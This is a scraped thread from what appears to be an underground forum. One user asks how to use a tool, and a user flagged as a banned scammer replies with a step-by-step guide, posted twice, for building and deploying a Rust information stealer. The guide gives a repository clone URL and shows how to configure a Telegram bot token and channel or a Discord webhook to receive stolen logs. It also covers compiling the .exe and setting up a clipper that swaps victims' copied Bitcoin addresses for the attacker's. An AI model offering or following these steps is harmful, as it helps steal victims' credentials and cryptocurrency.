brotherdoge HDD-drive Пользователь Регистрация 04.06.2022 Сообщения 36 Реакции 4 Гарант сделки 2 12.09.2022 Добавить закладку #41 Can anyone explain how to use this tool?Thanks
DanteXDark (L3) cache Пользователь Регистрация 28.10.2021 Сообщения 200 Реакции 41 12.09.2022 Добавить закладку #42 brotherdoge сказал(а): Can anyone explain how to use this tool?Thanks simple
brotherdoge HDD-drive Пользователь Регистрация 04.06.2022 Сообщения 36 Реакции 4 Гарант сделки 2 12.09.2022 Добавить закладку #43 DanteXDark сказал(а): simple Really? Could you explain it though?
runtim3 GANDALF THE GOLDEN КИДАЛА Регистрация 11.01.2022 Сообщения 226 Реакции 92 Гарант сделки 3 12.09.2022 Добавить закладку #44 Пожалуйста, обратите внимание, что пользователь заблокирован The guide is pretty self explanatory Requirements ( Do this to be able to run the program ) Install Rustup Install VS Studio and select Desktop development with C++ (needed for library linking) Clone this repo git clone https://gitlab.com/Lxca364/rust-stealer.git Go to the newly created directory cd rust-stealer Now open the main.rsin your favorite IDE We are recommend VSC ( Visual studio code ) With VSC type in your cmd code src/main.rs Telegram ( to receive logs in telegram ) Change the Delivery Mode to Telegram const MODE: DeliveryMethod = DeliveryMethod:ELEGRAM; Add between the two quotes your Telegram Bot Token const BOT_TOKEN: &str = ""; It will look something like this const BOT_TOKEN: &str = "5557828732:AAGVvR8uOQxKW160blzw8OUnQeOLKULZccg"; After that add your Channel ID where you want to receive the logs const CHANNEL_ID: i64 = -0 You can get the Channel ID via the Web Client https://web.telegram.org/z/#{YOUR CHANNEL ID} It will look something like this const CHANNEL_ID: i64 = -1674383273 Discord ( to receive logs in discord ) Change the Delivery Mode to Discord const MODE: DeliveryMethod = DeliveryMethod:ISCORD; Add between the two quotes your Discord Webhook URL const DISCORD_WEBHOOK: &str = ""; It will look somethink like this const DISCORD_WEBHOOK: &str = "https://discord.com/api/webhooks/10...YTp1iBFjiJLbQZ8Lf6f4nMulOH1ncGIP7ON-7XgLN-Ft0"; Build ( make your .exe file ) Go back to your cmd Type cargo build --release When the command is finished the builded stealer can be found at .\target\release\ Clipper ( switches copied btc address with yours ) Go into clipper\mod.rs Now Insert Every Address/Wallet you wanna clip into this (Make sure it's between the two ".
The guide is pretty self explanatory Requirements ( Do this to be able to run the program ) Install Rustup Install VS Studio and select Desktop development with C++ (needed for library linking) Clone this repo git clone https://gitlab.com/Lxca364/rust-stealer.git Go to the newly created directory cd rust-stealer Now open the main.rsin your favorite IDE We are recommend VSC ( Visual studio code ) With VSC type in your cmd code src/main.rs Telegram ( to receive logs in telegram ) Change the Delivery Mode to Telegram const MODE: DeliveryMethod = DeliveryMethod:ELEGRAM; Add between the two quotes your Telegram Bot Token const BOT_TOKEN: &str = ""; It will look something like this const BOT_TOKEN: &str = "5557828732:AAGVvR8uOQxKW160blzw8OUnQeOLKULZccg"; After that add your Channel ID where you want to receive the logs const CHANNEL_ID: i64 = -0 You can get the Channel ID via the Web Client https://web.telegram.org/z/#{YOUR CHANNEL ID} It will look something like this const CHANNEL_ID: i64 = -1674383273 Discord ( to receive logs in discord ) Change the Delivery Mode to Discord const MODE: DeliveryMethod = DeliveryMethod:ISCORD; Add between the two quotes your Discord Webhook URL const DISCORD_WEBHOOK: &str = ""; It will look somethink like this const DISCORD_WEBHOOK: &str = "https://discord.com/api/webhooks/10...YTp1iBFjiJLbQZ8Lf6f4nMulOH1ncGIP7ON-7XgLN-Ft0"; Build ( make your .exe file ) Go back to your cmd Type cargo build --release When the command is finished the builded stealer can be found at .\target\release\ Clipper ( switches copied btc address with yours ) Go into clipper\mod.rs Now Insert Every Address/Wallet you wanna clip into this (Make sure it's between the two ".